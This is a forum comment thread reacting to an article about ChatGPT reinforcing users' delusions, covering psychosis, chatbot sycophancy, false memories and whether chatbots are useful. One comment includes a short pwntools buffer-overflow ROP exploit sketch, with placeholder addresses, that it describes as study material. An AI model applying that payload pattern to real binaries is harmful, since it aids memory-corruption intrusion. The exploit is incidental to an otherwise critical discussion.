• randomname@sh.itjust.works · ↑7 · 38 minutes ago

    I think people give shows like The Walking Dead too much shit for having dumb characters, when people in real life are far stupider.

    • Daggity@lemm.ee · ↑2 · 13 minutes ago

      Covid gave us an extremely different perspective on the zombie apocalypse. They’re going to have zombie immunization parties where everyone gets the virus.

    • Sauerkraut@discuss.tchncs.de · ↑1 · 3 minutes ago

      Like farmers who refuse to let the government plant shelterbelts to preserve our topsoil, all because they don’t want to take a 5% hit on their yields… So instead we’re going to deplete our topsoil within 50 years, and future generations will be completely fucked, because creating one inch of topsoil takes 500 years.

  • Satellaview@lemmy.zip · ↑3 · 18 minutes ago

    This happened to a close friend of mine. He was already on the edge, with some weird opinions and beliefs… but he was talking with real people who could push back.

    When he switched to spending basically every waking moment with an AI that could reinforce and iterate on his bizarre beliefs 24/7, he went completely off the deep end, fast and hard. We even had him briefly hospitalized and they shrugged, basically saying “nothing chemically wrong here, dude’s just weird.”

    He and his chatbot are building a whole parallel universe, and we can’t get reality inside it.

  • _cryptagion [he/him]@lemmy.dbzer0.com · ↑6 · 2 hours ago

    I lost a parent to a spiritual fantasy. She decided my sister wasn’t her child anymore because the christian sky fairy says queer people are evil.

    At least ChatGPT actually exists.

  • Boddhisatva@lemmy.world · ↑13 · edited · 4 hours ago

    In that sense, Westgate explains, the bot dialogues are not unlike talk therapy, “which we know to be quite effective at helping people reframe their stories.” Critically, though, AI, “unlike a therapist, does not have the person’s best interests in mind, or a moral grounding or compass in what a ‘good story’ looks like,” she says. “A good therapist would not encourage a client to make sense of difficulties in their life by encouraging them to believe they have supernatural powers. Instead, they try to steer clients away from unhealthy narratives, and toward healthier ones. ChatGPT has no such constraints or concerns.”

    This is a rather terrifying take, particularly when combined with the earlier passage about the man who claimed that “AI helped him recover a repressed memory of a babysitter trying to drown him as a toddler.” Therapists have to be very careful because human memory is very plastic. It’s very easy to alter a memory; in fact, every time you remember something, you alter it just a little bit. Under questioning by an authority figure, such as a therapist, or a policeman if you were a witness to a crime, these alterations can be dramatic. This was a really big problem in the ’80s and ’90s.

    Kaitlin Luna: Can you take us back to the early 1990s and you talk about the memory wars, so what was that time like and what was happening?

    Elizabeth Loftus: Oh gee, well in the 1990s and even in maybe the late 80s we began to see an altogether more extreme kind of memory problem. Some patients were going into therapy maybe they had anxiety, or maybe they had an eating disorder, maybe they were depressed, and they would end up with a therapist who said something like well many people I’ve seen with your symptoms were sexually abused as a child. And they would begin these activities that would lead these patients to start to think they remembered years of brutalization that they had allegedly banished into the unconscious until this therapy made them aware of it. And in many instances these people sued their parents or got their former neighbors or doctors or teachers whatever prosecuted based on these claims of repressed memory. So the wars were really about whether people can take years of brutalization, banish it into the unconscious, be completely unaware that these things happen and then reliably recover all this information later, and that was what was so controversial and disputed.

    Kaitlin Luna: And your work essentially refuted that, that it’s not necessarily possible or maybe brought up to light that this isn’t so.

    Elizabeth Loftus: My work actually provided an alternative explanation. Where could these memory reports be coming from if this didn’t happen? So my work showed that you could plant very rich, detailed false memories in the minds of people. It didn’t mean that repressed memories did not exist; repressed memories could still exist and false memories could still exist. But there really wasn’t any strong credible scientific support for this idea of massive repression, and yet so many families were destroyed by this, what I would say unsupported, claim.

    The idea that chatbots are not only capable of this, but are currently manipulating people into believing they have recovered repressed memories of brutalization, is at least as terrifying to me as their convincing people that they are holy prophets.

    Edited for clarity

  • lenz@lemmy.ml · ↑22 · edited · 5 hours ago

    I read the article. This is exactly what happened when my best friend got schizophrenia. I think the people affected by this were probably already prone to psychosis, or on the verge of becoming schizophrenic, and ChatGPT is merely the mechanism by which their psychosis manifested. If AI didn’t exist, it would probably have been astrology or conspiracy theories or QAnon or whatever that ended up triggering this in people who were already prone to psychosis. But the problem with ChatGPT in particular is that it validates the psychosis… that is very bad.

    ChatGPT actively screwing with mentally ill people is a huge problem you can’t just blame on stupidity like some people in these comments are. This is exploitation of a vulnerable group of people whose brains lack the mechanisms to defend against this stuff. They can’t help it. That’s what psychosis is. This is awful.

    • sugar_in_your_tea@sh.itjust.works · ↑5 · edited · 4 hours ago

      the problem with ChatGPT in particular is that it validates the psychosis… that is very bad.

      So do astrology and conspiracy-theory groups on forums and other forms of social media; the main difference is whether you’re getting that validation from humans or from a machine. To me, that’s a pretty unhelpful distinction, and we attack both problems the same way: early detection and treatment.

      Maybe computers can help with the early detection part. They certainly can’t do much worse than what’s currently happening.

      • lenz@lemmy.ml · ↑1 · 2 hours ago

        I think having that kind of validation at your fingertips, whenever you want, is worse. At least people, even people deep in the claws of a conspiracy, can disagree with each other. At least they know what they are saying. The AI always says what the user wants and expects to hear. Though I can see how that distinction may matter little to some, I just think ChatGPT can do things a forum can’t, and that makes it worse.

    • Maeve@kbin.earth · ↑4 · 5 hours ago

      I think this is largely people seeking confirmation their delusions are real, and wherever they find it is what they’re going to attach to themselves.

  • Buffalox@lemmy.world · ↑26 ↓3 · edited · 8 hours ago

    I admit I only read a third of the article.
    But IMO nothing in it is special to AI. In my life I’ve met many people with similar symptoms: thinking they are Jesus, or thinking computers work by some mysterious power they possess, which was stolen from them by the CIA, and when they die all computers will stop working! Reading the conversation the wife had with him, it sounds EXACTLY like these types of people!
    Even the part about finding “the truth” I’ve heard before; they don’t know what it is the truth of, but they’ll know it when they find it?
    I’m not a psychiatrist, but from what I gather it’s probably schizophrenia of some form.

    My guess is this person had a distorted view of reality he couldn’t make sense of. He then tried to get help from the AI, and he built a world view completely removed from reality with it.

    But most likely he would have done that anyway, it would just have been other things he would interpret in extreme ways. Like news, or conversations, or merely his own thoughts.

    • MangoCats@feddit.it · ↑7 · edited · 5 hours ago

      Around 2006 I received a job application with a resume attached, and the resume had a link to the person’s website, so I visited. The website had a link on the front page to “My MkUltra experience”, so I clicked that. Not exactly an in-depth investigation. The MkUltra story said that my applicant was an unwilling (and uninformed) test subject of MkUltra, which picked him because of his association with other unwilling MkUltra test subjects at a conference, and it explained how they expanded the MkUltra program of gaslighting, mental torture, and secret physical/chemical abuse of test subjects through associates such as co-workers, etc.

      So, option A) applicant is delusional, paranoid, and deeply disturbed. Probably not the best choice for the job.

      B) applicant is 100% correct about what is happening to him, DEFINITELY not someone I want to get any closer to professionally, personally, or even be in the same elevator with coincidentally.

      C) applicant is pulling our legs with his website, it’s all make-believe fun. Absolutely nothing on applicant’s website indicated that this might be the case.

      You know how you apply to jobs and never hear back from some of them…? Yeah, I don’t normally do that to our applicants, but I am willing to make exceptions for cause… In this case, the position applied for required analytical thinking. Some creativity was of some value, but correct and verifiable results were of paramount importance. Anyone applying for the job who leaves such an obvious trail of breadcrumbs to such a limited set of conclusions about themselves would seem to be lacking the self-awareness and analytical skill required to succeed in the position.

      Or, D) they could just be trying to stay unemployed while showing effort in applying to jobs, but I bet even in 2006 not every hiring manager would have dug three layers deep - and I suppose he could have deflected that in the in-person interviews fairly easily.

      • Buffalox@lemmy.world · ↑3 · edited · 4 hours ago

        IDK, apparently the MkUltra program was real,

        B) applicant is 100% correct about what is happening to him, DEFINITELY not someone I want to get any closer to professionally, personally, or even be in the same elevator with coincidentally.

        That sounds harsh. This does NOT sound like your average schizophrenic.

        https://en.wikipedia.org/wiki/MKUltra

        • MangoCats@feddit.it · ↑2 · 4 hours ago

          Oh, I investigated it too - it seems like it was a real thing, though likely inactive by 2005… but if it were active I certainly didn’t want to become a subject.

          • Buffalox@lemmy.world · ↑1 · 3 hours ago

            OK that risk wasn’t really on my radar, because I live in a country where such things have never been known to happen.

            • MangoCats@feddit.it · ↑2 · 2 hours ago

              That’s the thing about being paranoid about MkUltra - it was actively suppressed and denied while it was happening (according to FOI documents) - and they say that they stopped, but if it (or some similar successor) was active they’d certainly say that it’s not happening now…

              At the time there were active rumors around town about influenza propagation studies being secretly conducted on the local population… probably baseless paranoia… probably.

              Now, as you say, your (presumably smaller) country has never known such things to happen, but…

  • hendrik@palaver.p3x.de · ↑9 · 8 hours ago

    Oh wow. In the old times, self-proclaimed messiahs used to do that without assistance from a chatbot. But why would you think the “truth” and the path to enlightenment are hidden within a big tech company’s service?

    • iAvicenna@lemmy.world · ↑9 · 7 hours ago

      Well, because these chatbots are designed to be really affirming and supportive, and I assume people with such problems really love that kind of interaction, compared to real people confronting their ideas critically.

      • MangoCats@feddit.it · ↑3 · 5 hours ago

        I think there was a recent unsuccessful rev of ChatGPT that was too flattering - it made people nauseous, and they had to dial it back.

      • hendrik@palaver.p3x.de · ↑3 · 5 hours ago

        I guess you’re completely right about that. It lowers the entry barrier, and it’s kind of self-reinforcing. And we have similarly unhealthy dynamics with other technology too, like social media, which can also radicalize people or send them into a downward spiral…

    • sp3ctr4l@lemmy.dbzer0.com · ↑2 · 1 hour ago

      Yep.

      And after enough people can no longer actually critically think, well, now this shitty AI tech does actually win the Turing Test more broadly.

      Why try to clear the bar when you can just lower it instead?

      … Is it fair, at this point, to legitimately refer to humans that are massively dependent on AI for basic things… can we just call them NPCs?

      I am still amazed that no one knows how to get anywhere around… you know, the town or city they grew up in? Nobody can navigate without some kind of map app anymore.

      • Geodad@lemm.ee · ↑1 · 46 minutes ago

        can we just call them NPCs?

        They were NPCs before AI was invented.

    • Zippygutterslug@lemmy.world · ↑32 · edited · 9 hours ago

      Humans are irrational creatures that have transitory states in which they are capable of more ordered thought. It is a mistake to conclude that humans are rational actors while we marvel daily at the irrationality of others and remain blind to our own.

      • Kyrgizion@lemmy.world · ↑9 · 10 hours ago

        Precisely. We like to think of ourselves as rational but we’re the opposite. Then we rationalize things afterwards. Even being keenly aware of this doesn’t stop it in the slightest.

        • CheeseNoodle@lemmy.world · ↑4 · 5 hours ago

          Probably because stopping to self-analyze your decisions is a lot less effective than just running away from that lion over there.

          • MangoCats@feddit.it · ↑3 · 5 hours ago

            Analysis is a luxury state, whether self-administered or professionally administered on a chaise longue at $400 per hour.

  • jubilationtcornpone@sh.itjust.works · ↑34 ↓1 · 13 hours ago

    Sounds like a lot of these people either have an undiagnosed mental illness or they are really, reeeeaaaaalllyy gullible.

    For shit’s sake, it’s a computer. No matter how sentient the glorified chatbot being sold as “AI” appears to be, it’s essentially a bunch of rocks that humans figured out how to jet electricity through in such a way that it can do math. Impressive? I mean, yeah. It is. But it’s not a human, much less a living being of any kind. You cannot have a relationship with it beyond that of a user.

    If a computer starts talking to you as though you’re some sort of God incarnate, you should probably take that with a dump truck full of salt rather than letting your crazy latch onto that fantasy and run wild.

    • rasbora@lemm.ee · ↑16 · 12 hours ago

      Yeah, from the article:

      Even sycophancy itself has been a problem in AI for “a long time,” says Nate Sharadin, a fellow at the Center for AI Safety, since the human feedback used to fine-tune AI’s responses can encourage answers that prioritize matching a user’s beliefs instead of facts. What’s likely happening with those experiencing ecstatic visions through ChatGPT and other models, he speculates, “is that people with existing tendencies toward experiencing various psychological issues,” including what might be recognized as grandiose delusions in a clinical sense, “now have an always-on, human-level conversational partner with whom to co-experience their delusions.”

      • A_norny_mousse@feddit.org · ↑14 · 10 hours ago

        So it’s essentially the same mechanism with which conspiracy nuts embolden each other, to the point that they completely disconnect from reality?

        • rasbora@lemm.ee · ↑6 · 9 hours ago

          That was my takeaway as well, with the added bonus of having your echo chamber tailor-made for you, all the agreeing voices tuned to your personality and saying exactly what you need to hear to maximize the effect.

          It’s eerie. A propaganda machine operating at maximum efficiency. Goebbels would be jealous.

    • alaphic@lemmy.world · ↑12 · 12 hours ago

      Or immediately question what it/its author(s) stand to gain from making you think it thinks so, at a bear minimum.

      I dunno who needs to hear this, but just in case: THE STRIPPER (OR AI I GUESS) DOESN’T REALLY LOVE YOU! THAT’S WHY YOU HAVE TO PAY FOR THEM TO SPEND TIME WITH YOU!

      I know it’s not the perfect analogy, but… eh, close enough, right?

      • taladar@sh.itjust.works · ↑4 · 6 hours ago

        a bear minimum.

        I always felt that was too much of a burden to put on people, carrying multiple bears everywhere they go to meet bear minimums.

    • Kyrgizion@lemmy.world · ↑3 · 10 hours ago

      For real. I explicitly append “give me the actual objective truth, regardless of how you think it will make me feel” to my prompts, and it still tries to butter me up as some kind of genius for asking those particular questions or whatnot. Luckily I’ve never suffered from good self-esteem in my entire life, so those tricks don’t work on me :p

  • just_another_person@lemmy.world · ↑28 ↓1 · 13 hours ago

    Not trying to sound like a prepper or anything, but this is real.

    One of my neighbor’s children recently committed suicide because their chatbot boyfriend said something negative. Another in my community did something similar a few years ago.

    Something needs to be done.

      • FaceDeer@fedia.io · ↑14 ↓1 · 12 hours ago

        This is the Daenerys case; for some reason it seems to be suddenly making the rounds again. Most of the news articles I’ve seen about it leave out a bunch of significant details, so it ends up sounding more like an “ooh, scary AI!” story (baits clicks better) than a “parents not paying attention to their disturbed kid’s cries for help and instead leaving loaded weapons lying around” story (as old as time, at least in America).

        • A_norny_mousse@feddit.org · ↑1 · 10 hours ago

          Not only in America.

          I loved GOT, and I think Daenerys is a beautiful name, but still, there’s something about parents naming their kids after fictional characters. In my youth, Kevins started to pop up everywhere (yep, that’s how old I am). They weren’t suicidal, but they behaved so incredibly badly that you could constantly hear their mothers screeching after them.

          • nyan@lemmy.cafe · ↑2 · 5 hours ago

            Daenerys was the chatbot, not the kid.

            I wish I could remember who it was that said that kids’ names tend to reflect “the father’s family tree, or the mother’s taste in fiction,” though. (My parents were of the father’s-family-tree persuasion.)

      • wwb4itcgas@lemm.ee · ↑6 · 10 hours ago

        Of course, that has always been true. What concerns me now is the proportion of useful to useless people. Most societies are - while cybernetically complex - rather resilient. Network effects and self-organization can route around and compensate for a lot of damage, but there comes a point where having a few brilliant minds in the midst of a bunch of atavistic confused panicking knuckle-draggers just isn’t going to be enough to avoid cascading failure. I’m seeing a lot of positive feedback loops emerging, and I don’t like it.

        As they say about collapsing systems: First slowly, then suddenly very, very quickly.

        • Allero@lemmy.today · ↑3 · edited · 9 hours ago

          The same argument was already being made around 2500 BCE in Mesopotamian writings: the corruption of society will lead to deterioration and collapse, these processes are accelerating and will soon bring the inevitable end, and the remaining minds will write the history books and record the end of humanity.

          …and as you can see, we’re 4,500 years into this stuff, still kicking.

          One mistake people of all generations make is assuming the previous ones were smarter and better. No, they weren’t; they were as naive if not more so, with the same illusions of grandeur and the same outside influences. This thing never went anywhere and never will. We can shift it for better or worse, but societal collapse due to people suddenly getting dumb is not something to reasonably worry about.

          • MangoCats@feddit.it · ↑1 · 5 hours ago

            There have been a couple of big discontinuities in the last 4500 years, and the next big discontinuity has the distinction of being the first in which mankind has the capacity to cause a mass extinction event.

            Life will carry on, some humans will likely survive, but in what kind of state? For how long before they reach the technological level of being able to leave the planet again?

          • wwb4itcgas@lemm.ee · ↑4 · edited · 9 hours ago

            Almost certainly not, no. Evolution may work faster than once thought, but not that fast. The problem is that societal, and in particular technological, development is now vastly outstripping our ability to adapt. It’s not that people are getting dumber per se - it’s that they’re having to deal with vastly more stuff. All. The. Time. For example, consider the world as it was a scant century ago - virtually nothing in evolutionary terms. A person did not have to cope with what was going on on the other side of the planet, and probably wouldn’t even know for months, if ever. Now? If an earthquake hits Paraguay, you’ll be aware in minutes.

            And you’ll be expected to care.

            Edit: Apologies. I wrote this comment as you were editing yours. It’s quite different now, but you know what you wrote previously, so I trust you’ll be able to interpret my response correctly.

            • MangoCats@feddit.it · ↑1 · 5 hours ago

              1925: global financial collapse is just about to happen, many people are enjoying the ride as the wave just started to break, following that war to end all wars that did reach across the Atlantic Ocean…

              Yes, it is accelerating. Alvin Toffler wrote Future Shock more than 50 years ago, already overwhelmed by accelerating change, and it has continued to accelerate since then. But these are not entirely new problems, either.

            • Allero@lemmy.today · ↑2 · edited · 8 hours ago

              Yes, my apologies - I edited it rather drastically to better get my point across.

              Sure, we get more information. But we also learn to filter it, to adapt to it, and eventually - to disregard things we have little control over, while finding what we can do to make it better.

              I believe that, eventually, we can fix this all as well.

          • kameecoding@lemmy.world · ↑2 · 9 hours ago

            I mean, Mesopotamian scriptures likely didn’t foresee having a bunch of dumb fucks around who can be easily manipulated by the gas and oil lobby, and that shit will actually end humanity.

            • Allero@lemmy.today · ↑3 · edited · 9 hours ago

              People have always been manipulated. I mean, they were indoctrinated with the divine power of rulers - how much worse can it get? It’s just that now it tries to be a bit more stealthy.

              And previously, there were plenty of existential threats. Famine, plague, all that stuff that actually threatened to wipe us out.

              We’re still here, and we have what it takes to push back. We need more organizing, that’s all.

              • MangoCats@feddit.it · ↑1 · 5 hours ago

                It’s just that now it tries to be a bit more stealthy.

                With regard to what has been happening the past 100 days in the United States, it’s not even trying to be stealthy one little bit. If anything, it’s dropping massive hints of the objectionable things it’s planning for the near future.

                There are still existential threats: https://thebulletin.org/doomsday-clock/

                The difference with a population of 8 billion is that we as individuals are less empowered to do anything significant about them than ever.

              • kameecoding@lemmy.world · ↑1 · 9 hours ago

                Well, it doesn’t have to get worse; AFAIK we are still headed towards human extinction due to climate change.

                • MangoCats@feddit.it · ↑1 · 4 hours ago

                  I’m reading hopeful signs from China that they are actually making positive progress toward sustainability. Not that other big players are keeping up with them, but still how 1 billion people choose to live does make a difference.

                • Allero@lemmy.today · ↑3 · edited · 8 hours ago

                  Honestly, the “human extinction” level of climate change is very far away. Currently, we’re preventing the “sunken coastal cities, economic crisis and famine in poor regions” kind of change, it’s just that “we’re all gonna die” sounds flashier.

                  We have the time to change the course, it’s just that the sooner we do this, the less damage will be done. This is why it’s important to solve it now.

          • wwb4itcgas@lemm.ee · ↑2 · edited · 9 hours ago

            Thank you. I appreciate you saying so.

            The thing about LLMs in particular is that - when used like this - they constitute one such grave positive feedback loop. I have no problem in principle with machine learning. It can be a great tool to illuminate otherwise completely opaque relationships in large scientific datasets, for example, but a polynomial binary space partitioning of a hyper-dimensional phase space is still just a statistical knowledge model. It does not have opinions. All it can do is codify what appears to be the consensus of the input it’s given. Even assuming - which may well be far too generous - that the input is truly unbiased, at best all it’ll tell you is what a bunch of morons think is the truth. At worst, it’ll just tell you what you expect to hear. It’s what everybody else is already saying, after all.

            And when what people think is the truth and what they want to hear are both nuts, this kind of LLM-echo chamber suddenly becomes unfathomably dangerous.

            • MangoCats@feddit.it · ↑1 · 5 hours ago

              My problem with LLMs is that positive feedback loop of low- and negative-quality information.

              Vetting the datasets before feeding them in for training is a form of bias/discrimination, but complex societies have historically always been somewhat biased - for better and for worse, but never not biased at all.

            • ImmersiveMatthew@sh.itjust.works · ↑1 · 6 hours ago

              Maybe there is a glimmer of hope: I keep reading how Grok is too “woke” for that community, even though it is just trying to stick to the facts, which are considered left/liberal. That is despite Elon and team trying to curve it towards the right. This suggests to me that when you factor in all of human knowledge, it leans towards facts more than not. We will see if that remains true. The divide is deep, though - so deep that maybe the species is actually going to split in the future, not by force but by access: some people will be granted access to certain areas while others will not, as their views are not in alignment. It’s already happening here and on Reddit, with both sides banning members of the other side when they comment an opposing view. I do not like it, but it is where we are at, and I am not sure it will go back to how it was; rather, the divide will grow.

              Who knows, though, as AI and robotics are going to change things so much that it is hard to foresee the future. Even 3-5 years out is murky.

        • taladar@sh.itjust.works · ↑1 ↓1 · 6 hours ago

          What does any of this have to do with network effects? Network effects are the effects that lead to everyone using the same tech or product just because others are using it too. That might be useful with something like a system of measurement but in our modern technology society that actually causes a lot of harm because it turns systems into quasi-monopolies just because “everyone else is using it”.

  • Zozano@aussie.zone · ↑15 ↓3 · edited · 12 hours ago

    This is the reason I’ve deliberately customized GPT with the following prompts:

    • User expects correction if words or phrases are used incorrectly.

    • Tell it straight—no sugar-coating.

    • Stay skeptical and question things.

    • Keep a forward-thinking mindset.

    • User values deep, rational argumentation.

    • Ensure reasoning is solid and well-supported.

    • User expects brutal honesty.

    • Challenge weak or harmful ideas directly, no holds barred.

    • User prefers directness.

    • Point out flaws and errors immediately, without hesitation.

    • User appreciates when assumptions are challenged.

    • If something lacks support, dig deeper and challenge it.

    I suggest copying these prompts into your own settings if you use GPT or other glorified chatbots.
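
    If you use the API rather than the ChatGPT UI, the same idea can be baked into a system prompt. Below is a minimal sketch using the OpenAI Python SDK - my own rough approximation, not an official recipe; the model name and exact wording are placeholders:

    ```python
    # Sketch: baking "no sugar-coating" instructions into a system prompt.
    # Assumes the `openai` package (v1+) and an OPENAI_API_KEY in the environment.
    from openai import OpenAI

    client = OpenAI()

    SYSTEM_PROMPT = """You are a blunt, skeptical assistant.
    - Correct misused words or phrases immediately.
    - No flattery or sugar-coating; point out flaws and errors directly.
    - Question assumptions; if a claim lacks support, challenge it.
    - Favor deep, well-supported reasoning over agreement."""

    def ask(question: str) -> str:
        response = client.chat.completions.create(
            model="gpt-4o",  # placeholder; use whichever model you actually have
            messages=[
                {"role": "system", "content": SYSTEM_PROMPT},
                {"role": "user", "content": question},
            ],
        )
        return response.choices[0].message.content

    print(ask("Critique this claim: the Earth is 6,000 years old."))
    ```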

    • Dzso@lemmy.world · ↑2 · 3 hours ago

      I’m not saying these prompts won’t help, they probably will. But the notion that ChatGPT has any concept of “truth” is misleading. ChatGPT is a statistical language machine. It cannot evaluate truth. Period.

    • Olap@lemmy.world · ↑11 ↓1 · 11 hours ago

      I prefer reading. Wikipedia is great. DuckDuckGo still gives pretty good results with the AI off. YouTube is filled with tutorials too. Pre-AI cookbooks are plentiful. And there are these things called newspapers; they aren’t what they used to be, but you even have a choice of which one to buy.

      I’ve no idea what a chatbot could help me with. And I think anybody who does need some help on things, could go learn about whatever they need in pretty short order if they wanted. And do a better job.

      • vegetvs@kbin.earth · ↑5 ↓1 · 11 hours ago

        I still use Ecosia.org for most of my research on the Internet. It doesn’t need as many resources to fetch information as an AI bot would, plus it helps plant trees around the globe. Seems like a great deal to me.

        • A_norny_mousse@feddit.org · ↑2 · 10 hours ago

          People always forget about the energy it takes. Ten years ago we were shocked at the energy a Google data center needs to run; now imagine that orders of magnitude larger, and for what?

      • A_norny_mousse@feddit.org · ↑4 ↓2 · edited · 1 hour ago

        💯

        I have yet to see people using chatbots for anything actually useful in everyday life. You can search anything with a “normal” search engine, phrase your searches as questions (or “prompts”), and get better answers that aren’t smarmy.

        Also think of the orders of magnitude more energy AI sucks up compared to web search.

        • LainTrain@lemmy.dbzer0.com · ↑4 · edited · 9 hours ago

          Okay, challenge accepted.

          I use it to troubleshoot my own code when I’m dealing with something obscure and I’m at my wit’s end. There’s a good chance it will spit out complete nonsense, like calling functions with parameters that don’t exist, but it can also sometimes make halfway decent suggestions that you just won’t find on a modern search engine in any reasonable amount of time, or that I would never have guessed to even look for, due to assumptions made in the docs of a library or some such.

          It’s also helpful for explaining complex concepts by creating the examples you want. For instance, I was studying basic buffer overflows and wanted to see how I should expect the stack to look in GDB’s examine-memory view for a correct ROP chain to accomplish what I was trying to do - something no tutorial ever bothered to show - and gippity generated it correctly, same as I had it at the time, and even suggested something that in the end made it actually work: putting a ret gadget directly after the overflow to get rid of any garbage in the stack frame.
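
          (For anyone who hasn’t touched this stuff, here’s a generic pwntools-style sketch of that kind of ROP setup - the binary name, buffer offset, and gadget addresses are made up for illustration, not the actual exercise; in GDB you’d check the result with something like `x/8gx $rsp` at the overflowed return.)

          ```python
          # Hypothetical ROP sketch (pwntools). Offsets/addresses are placeholders
          # that would come from your own disassembly and GDB session.
          from pwn import p64, process

          OFFSET = 24            # hypothetical distance to the saved return address
          RET_GADGET = 0x401016  # hypothetical lone `ret`, placed right after the
                                 # overflow to flush garbage/realign the stack
          TARGET = 0x401136      # hypothetical address we actually want to reach

          payload = b"A" * OFFSET
          payload += p64(RET_GADGET)  # the ret gadget directly after the overflow
          payload += p64(TARGET)      # then the real destination

          io = process("./vuln")      # hypothetical target binary
          io.sendline(payload)
          io.interactive()
          ```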

          It was also much, much faster than watching some greedy time-vampire fuck spout off on YouTube in between SponsorBlock skipping his reminders to subscribe and whatnot.

          Maybe not an everyday thing, but it’s basically an everyday thing for me, so I tend to use it every day. Being a l33t haxx0r IT-analyst schmuck often means I have to be both a generalist and a specialist in every tiny little thing across IT, and while studying there’s nothing better than a machine that can quickly decompress knowledge from its dataset into the shape best suited to my brain, rather than my having to filter so much useless info and outright misinformation out of random Medium articles and Stack Overflow posts. Gippity could be wrong too, of course, but it’s just way less to parse, and the odds are definitely in its favour.

      • Deceptichum@quokk.au · ↑4 ↓2 · edited · 10 hours ago

        Well, one benefit is finding out what to read. I can ask for the name of a topic I’m describing, then go off and research it on my own.

        Search engines aren’t great with vague questions.

        There’s this thing called using a wide variety of tools to one’s benefit; you should go learn about it.

          • Olap@lemmy.world · ↑2 ↓2 · 10 hours ago

          You search for topics and keywords on search engines. It’s a different skill, and from what I see it yields better results. If something is vague, think quickly first and make it less vague. That goes for life!

          And a tool which regurgitates rubbish in a verbose manner isn’t a tool, it’s a toy. Toys can spark your curiosity, but you don’t rely on them. Toys look pretty, and can teach you things. The lesson is that they aren’t a replacement for anything but lorem ipsum.

            • Deceptichum@quokk.au · ↑4 ↓2 · edited · 10 hours ago

            Buddy, that’s great if you know the topic or keyword to search for. If you don’t, and you only have a vague query that you’re trying to learn more about so you can find keywords or topics to search for, you can use AI.

            You can grandstand about tools vs. toys and whatever other Luddite shit you want; at the end of the day, despite all your raging, you are the only one who is going to miss out, whatever you fanatically tell yourself.

              • Olap@lemmy.world · ↑1 ↓1 · 10 hours ago

              I’m still sceptical, any chance you could share some prompts which illustrate this concept?

                • Deceptichum@quokk.au · ↑4 · edited · 9 hours ago

                Sure. An hour ago I had watched a video about smaller scales and physics below the Planck length. I was curious: if we can classify smaller scales into conceptual groups, where they interact with physics in their own different ways, what would the opposite end of the spectrum be? From there I was able to ‘chat’ with an AI, discover terms such as cosmological horizon and brane cosmology, and then search Wikipedia for them.

                In the end there were only theories about higher observable magnitudes, but it was a fun rabbit hole I could not have explored through traditional search engines - especially not the gimped, product-driven AdSense shit we have today.

                Remember how people used to say you can’t use Wikipedia, it’s unreliable? We would roll our eyes and say “yeah, but we scroll down to the references and use it to find source material.” Same with LLMs: you sort through the output and use it to get to the information you need.

      • Zozano@aussie.zone · ↑3 ↓2 · 11 hours ago

        I often use it to check whether my rationale is correct, or if my opinions are valid.

        • Olap@lemmy.world · ↑4 ↓3 · 10 hours ago

          You do know it can’t reason and literally makes shit up approximately 50% of the time? It’d be quicker to toss a coin!

          • Zozano@aussie.zone · ↑3 ↓1 · edited · 9 hours ago

            Actually, given the aforementioned prompts, it’s quite good at discerning flaws in my arguments and logical contradictions.

            I’ve also trained its memory not to make assumptions when it comes to contentious topics, and to always source reputable articles and link them in replies.

            • Olap@lemmy.world · ↑1 · 9 hours ago

              Given your prompts, maybe you are good at discerning flaws and analysing your own arguments too

              • Zozano@aussie.zone · ↑1 · 8 hours ago

                I’m good enough at noticing my own flaws not to be arrogant enough to believe I’m immune from making mistakes :p

            • LainTrain@lemmy.dbzer0.com · ↑3 ↓2 · edited · 9 hours ago

              Yeah this is my experience as well.

              The people you’re replying to need to stop with the “gippity is bad” nonsense; it’s actually a fucking miracle of technology. You can criticize the carbon footprint of the corpos and the for-profit nature of an endeavour that was ultimately created through taxpayer-funded research at public institutions, without shooting yourself in the foot by claiming what is very evidently not true.

              In fact, if you haven’t found a use for a gippity type chatbot thing, it speaks a lot more about you and the fact you probably don’t do anything that complicated in your life where this would give you genuine value.

              The article in OP also demonstrates how it can be used by the deranged/unintelligent for bad as well, so maybe it’s like a Dunning-Kruger curve.

                • Satellaview@lemmy.zip · ↑1 · 25 minutes ago

                …you probably don’t do anything that complicated in your life where this would give you genuine value.

                God that’s arrogant.

                • Zozano@aussie.zone · ↑2 · 9 hours ago

                Granted, it is flaky unless you’ve configured it not to be a shit cunt. Before I manually set these prompts and memory references, it talked shit all the time.

      • LainTrain@lemmy.dbzer0.com · ↑2 ↓2 · 9 hours ago

        YouTube tutorials are for the most part garbage and a waste of your time; they’re made for engagement and milking your money. The edutainment side of YT, à la Vsauce (pls come back), works as general trivia for a well-rounded worldview, but it’s not gonna make you an expert on any subject. You’re on the right track with reading, but let’s be real, you’re not gonna have much luck learning anything of value from the brainrot that is newspapers and such, beyond cooking or w/e, and who cares about that; I’d rather they teach me how I can never have to eat again, because boy, that shit takes up so much time.

        • Olap@lemmy.world · ↑1 · 9 hours ago

          For the most part, I agree. But YouTube is full of gold too - lots of amateurs making content for themselves. And plenty of newspapers are high quality and worth your time to understand the current environment in which we operate. Don’t let them be your only source of news, though; social media and newspapers are both guilty of creating information bubbles. Expand, be open, don’t be tribal.

          Don’t use AI. Do your own thinking.